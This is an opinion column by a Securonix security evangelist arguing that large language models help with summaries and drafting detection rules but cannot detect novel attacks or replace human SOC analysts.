Please consider supporting us by disabling your content blocker.
loader

robot hand with a security shield

Pitinan Piyavatin via Alamy Stock

Cybersecurity is undergoing a transformation with the rise of AI technologies. Daily, new products and features are announced that utilize large language models (LLMs) to enhance the efficiency and precision of security operations. Some experts even speculate about the emergence of fully autonomous Security Operations Centers (SOCs), suggesting that the role of security analysts may soon become obsolete.

But is AI truly on the verge of taking over our threat detection and response capabilities?

While the potential for an AI singularity exists, it is overly simplistic and often misleading to assert that current AI advancements will lead us there. The capabilities of generative AI are indeed remarkable, yet they remain constrained. These systems rely heavily on extensive training data to produce text, images, and music, but their outputs are fundamentally limited to human-created concepts and ideas. Original thought is still beyond their reach.

These limitations stem from the fact that AI systems lack true comprehension of the concepts they manipulate; they merely generate text that resembles their training data. While this might seem impressive, a closer examination reveals that it often amounts to little more than “glorified autocomplete.”

For instance, many LLMs struggle with basic queries such as “How many r’s are there in strawberry?” or “What is the world record for crossing the English Channel entirely on foot?” These examples illustrate that while AI systems can produce responses, they lack genuine understanding. Recognizing this absence of cognitive comprehension challenges our perception of their errors.

So, why are we witnessing so many innovative and useful applications of these technologies? The answer lies in their effectiveness for specific problems where their lack of cognitive ability does not significantly hinder performance. For example, LLMs excel at generating text summaries.

One of the most successful applications of AI in security operations is the generation of textual explanations and summaries of incidents and investigations. LLMs can effectively create search queries or detection code based on human-generated descriptions. However, this is where their capabilities currently plateau.

Threat detection poses a significant challenge for SOCs using LLMs, as it may appear that these models can autonomously generate detection content. For example, I can ask Microsoft Copilot to create a sigma rule for detecting a log4j attack. However, a deeper analysis reveals the limitations of AI in this context.

  • When I mention “log4j attack,” I prompt the model to generate content based on a well-documented attack. Humans had to identify and comprehend these attacks before the AI could produce relevant content. There is a time lag between the occurrence of initial attacks and their subsequent analysis by humans, which is essential for the AI to generate accurate rules. This is not an unknown attack.

  • The generated rule is generic and based on widely recognized exploitation methods of a known vulnerability. While it may function adequately, it is a fragile approach that can yield as many false positives and negatives as a rule created by an average human analyst.

People are enthusiastic about the capabilities of these new models, asserting that LLMs will soon be able to detect unknown attacks. However, this belief overlooks the inherent limitations of AI technology and the nature of unknown attacks. To grasp these limitations, we can examine the rise of fileless attacks.

Malware detection systems historically focused on files written to disk, employing hooks to analyze data as it was written. But what if we had a highly efficient AI-based analyzer performing this task? Would that signify a flawless anti-malware solution? Not at all. Attackers have adapted their methods to evade detection, utilizing fileless malware that can be injected directly into memory without ever being written to disk. Consequently, our advanced AI would remain oblivious to such malicious code. The assumption that all malware must be written to disk is outdated, and AI systems may fail to monitor the correct locations.

Why New Attacks Are Hard to Detect

Intelligent attackers understand how detection systems operate and craft new attacks that evade detection. Attackers exhibit ingenuity at multiple levels, often circumventing our detection capabilities. For instance, an IP network may be thoroughly monitored for traffic, but this becomes irrelevant if a system is compromised via a Bluetooth vulnerability.

No AI system can analyze attack behavior at that level, identify deviations from previous behavior, and devise solutions to address those changes. This remains a task for humans and will continue to be until artificial general intelligence (AGI) is realized.

Know the Limits of AI in the SOC

With any tool, it is crucial to understand its value, its effective applications, and its limitations. While GenAI-based capabilities provide significant advantages for security operations, they are not a cure-all. Organizations must avoid extending these tools beyond their strengths, as doing so may lead to disappointing and potentially harmful outcomes.

About the Author

Augusto Barros

Cyber-Security Evangelist, Securonix

Augusto Barros is a seasoned security professional, currently serving as VP Cyber Security Evangelist at Securonix. In this role, he strategically delivers top-tier threat detection and response solutions. He assists clients worldwide in leveraging the latest SIEM advancements with best-in-class analytics to mitigate cyber threats and optimize ROI. Prior to joining Securonix, he spent five years as a research analyst at Gartner, engaging with numerous clients and vendors regarding their security operations challenges and solutions. His previous roles include security positions at CIBC and Finastra.